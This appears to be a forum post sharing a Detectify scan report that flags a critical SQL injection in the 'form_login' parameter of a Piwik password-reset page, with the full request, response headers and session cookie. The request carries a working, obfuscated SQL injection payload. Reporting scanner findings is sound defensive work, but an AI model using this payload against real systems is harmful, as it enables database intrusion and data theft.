@NA7KR wrote:
Found at
CVSS
9.3 of 10.0
Tags
critical
Vulnerable GET variable
form_login
What does this mean?
User input is used in a SQL query in a vulnerable way.
Read more at our article about SQL Injection.
What can happen?
An attacker can execute SQL-code, which includes reading/writing to the database and possible write directly to the file system.
-
Request Headers
GET /?form_login=bit_lEngtH((seleCt(rePeAt(mD5(REPEAt(MD5(0%3a%3aTEXT)%7c%7crandOm()%3a%3atEXt%2c1e7%3a%3aint))%2c1e2%3a%3aint))%7c%7cRandOm()%3a%3aTexT))%2f*%27%7c%7c(seleCt(rePeAt(mD5(REPEAt(MD5(0%3a%3aTEXT)%7c%7crandOm()%3a%3atEXt%2c1e7%3a%3aint))%2c1e2%3a%3aint))%7c%7cRandOm()%3a%3aTexT)%7c%7c%27*%2f&form_nonce=8929c493a1cdcfa3574b3e420e983b14&form_password=&form_password_bis=&module=Login&action=resetPassword HTTP/1.1
Accept
text/html application/xhtml+xml application/xml; q=0.9 image/webp /; q=0.8
User-Agent
Mozilla/5.0 (compatible; Detectify) +https://detectify.com/bot/76509da2082562ed8b46431286d58d4169695048
Host
counter.na7kr.us
Cookie
PIWIK_SESSID=4ensanupov0uc2t0o7t9avdm76
Cache-Control
no-store, no-cache
Pragma
no-cache
Accept-Encoding
gzip deflate-
Response Headers
HTTP/1.1 200 OK
PragmaX-Frame-Options
Content-Length
1
Cache-Control
no-store, must-revalidate
Content-Type
text/html; charset=utf-8
Date
Wed, 23 Mar 2016 01:05:00 GMT
ExpiresServer
Apache
Posts: 1
Participants: 1